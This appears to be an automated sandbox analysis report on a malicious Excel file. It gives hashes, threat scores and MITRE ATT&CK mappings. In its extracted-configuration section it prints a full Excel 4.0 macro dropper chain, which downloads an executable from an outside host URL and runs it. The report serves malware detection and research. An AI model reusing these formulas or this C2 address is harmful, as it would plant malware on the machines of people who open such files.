Overview

overview

10

Static

static

10

0ff0692939...18.xls

windows7-x64

10

0ff0692939...18.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip

  • Size

    85KB

  • Sample

    230310-m4pnaaeg41

  • MD5

    8e9252a52f41b4adee25949bdba0496a

  • SHA1

    061b8bebf86e8d7aecf1b2b6c3cff2a55fc86087

  • SHA256

    11ff1df44d316934267b2f7afe24889968ba45c7b44ad6e610a5062f13705d72

  • SHA512

    d6cd316035884af99d4212d509dccf4e31233f0065d75e5123cc0345dc71b80d3c90937b51f0d97d35a6c2035c4d9219e8a36d6e13861f833fbceeb5f6eb8ed5

  • SSDEEP

    1536:7eoi+XMGiZE6AxQPnuztVvK4O9fIMS/nUeGdhDwWfYjtO2aO6vzoVG8Y:Li+dVxQPuztFKJfL6WQhO2a5ghY

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Targets

    • Target

      0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.xlsx

    • Size

      94KB

    • MD5

      fb5ed444ddc37d748639f624397cff2a

    • SHA1

      3c1a4c0744203d2d08a23f4a9de10a1b593e7763

    • SHA256

      0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818

    • SHA512

      a62be2b995f835dda9fe86634986f6a2ae1f14cad5bb95590755ae9121cb2f83301cc52661a40c39ce4b9cf12aaed46084335779d10759d67d9153ba7404ad60

    • SSDEEP

      1536:+FOWzgGm5m839tLbt2M+hxICtyLKB9ibSZFeniz+IejsiiGcDUA:sz7mAyd2MLLKB9ib0reIZIA

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks